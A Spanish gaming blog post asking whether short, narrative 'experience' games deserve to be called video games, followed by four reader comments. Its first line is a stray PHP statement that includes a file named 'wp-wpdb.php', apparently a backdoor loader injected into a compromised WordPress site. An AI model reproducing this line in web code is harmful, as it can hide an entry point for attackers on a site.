if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); ¿Qué es un videojuego? – La Fortaleza de LeChuck

¿Qué es un videojuego?

opinión que es un videojuego

 Últimamente pienso mucho en lo que comporta la palabra videojuego, y de lo que crece y puede llegar a crecer gracias a su simple definición. Veo como llamamos videojuego a «cualquier cosa». No me refiero a que hayan juegos malísimos que sigan siendo considerados juegos, más bien hablo de esos supuestos videojuegos de dos horas de duración, sencillos, pero con un gran calado emocional que hace que los veamos con buenos ojos, pese a reconocer todos sus defectos claramente. Yo los llamo «experiencias», porque, como si fuera una película, ves el principio y final en una sola tarde, te cuentan una historia y la disfrutas. Cuan larga es la palabra videojuego. Pudiendo tener poco o mucho presupuesto, dos horas de duración, cinco minutos, o 100 horas, ser un continuo tutorial o tener libertad de exploración y decisión ¿Se le puede llamar a todo videojuego? ¿Hay un límite? ¿Qué es un videojuego?

Sobre los videojuegos llamados «experiencias» podemos decir muchas cosas negativas, pero en general a la gente se le queda  buen gusto, pues históricamente pocas veces los videojuegos han intentado llegarnos por el lado sentimental sin darnos también una jugabilidad consistente y larga, y últimamente gracias sobretodo a la distribución digital, que no comporta la regla no escrita de costar 60€ como el formato físico, se pueden permitir el lujo de hacer juegos cortos, como si fueran cortometrajes del videojuego que no van muy allá pero quedan para el recuerdo.

Este tipo de juegos suelen llegar de desarrolladores independientes que buscan otras formas de engancharnos que no usen muchos recursos, como pasa con el eternamente buscado apartado gráfico TOP. Sin embargo últimamente se están subiendo compañías como Ubisoft al carro, con juegos como Child of Light o Valiant Hearts, que son juegos con un buen tratamiento pero con mucho menor presupuesto que sus Watch Dogs y Assassin’s Creed y aún así también están dejando huella entre muchos jugadores, considerados «hardcores» y casuales.

 

 

Luego están esas aventuras, como Heavy Rain o Beyond Two Souls, en los que los controles se simplifican para que cualquiera sea capaz de seguir el hilo de la historia sin cabrearse con algún tipo de obstáculo. Pues la dificultad también está reñida con el éxito en el mercado mayoritario, de ahí que hayan cada día más juegos pasilleros, o mundos abiertos con el camino marcado constantemente.

Cuando llamamos a todos esos juegos «videojuegos», ¿Estamos insultando a los juegos clásicos más resistentes a nuestra habilidad, a juegos de mayor envergadura? ¿O simplemente estamos experimentando un crecimiento de géneros bestial o una evolución de la industria y no nos damos cuenta? Yo solo veo un hecho, que el videojuego cada día se acerca peligrosamente al consumo rápido, de pocas horas de duración, como verse una película o escucharse el último álbum de tu artista favorita. La falta de tiempo de los jugadores, sumado al hecho de que el número de juegos publicados en el mercado, entre distintas plataformas y formatos, está creciendo vertiginosamente semana tras semana, está haciendo que realmente haya gente que prefiera jugar a ese tipo de juegos y que aprecie el hecho de su corta duración. Mientras tanto, curiosamente el cine se estanca en su formato de dos horas y las series en televisión triunfan con largas temporadas grabadas con una calidad similar e incluso a veces superior a la media de las películas en taquilla.

 

Tu que opinas ¿Se le puede llamar a todo videojuego? ¿Tienes alguna preferencia entre unos y otros?

 

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

4 comentarios

  1. No creo que la duración o la dificultad sean dos características cruciales a la hora de identificar si estamos ante un videojuego o no. La duración depende de la habilidad del jugador, por lo tanto es relativa. Además, hay grandes clásicos como Another World que se pueden terminar en 15 minutos y no por ello deja de ser un videojuego. De la misma forma, la dificultad también es una cuestión subjetiva y no creo que un videojuego tenga que alcanzar un nivel de dificultad determinado para alcanzar dicho estatus.
    Desde mi punto de vista, un videojuego debe tener: gráficos (imágenes generadas por ordenador), interactividad, y reglas propias del medio (referente a la programación, la IA y esas cosas). El resto son complementos que pueden ser importantes (como la historia, el sonido, la narrativa…), pero no indispensables.

    1. Gracias por tu aportación.

      Es verdad que los juegos de antes eran más cortos, supongo que por problemas técnicos, y se recurría a la dificultad para dar más duración. La verdad es que ese recurso no me gusta nada para aumentar la duración de un juego… pero es lo que había por entonces.

      Como bien dices, eso conforma un videojuego. Al final hay varios tipos de juegos para satisfacer a un público cada vez mayor.

  2. Todos son videojuegos pero los hay que prefieren primar otras cosas a que el gameplay sea el centro de la experiencia, como se viene haciendo tradicionalmente desde el inicio de la industria hasta aproximadamente la llegada de Metal Gear Solid xD

    1. Yo también pensé en Metal Gear al hacer el artículo, pero son juegos demasiado buenos como para echarles en cara solo el hecho de que tengan muchos videos y no la jugabilidad, que sigue siendo buena y con tanto botón… totalmente anticasual xD

Dejar un comentario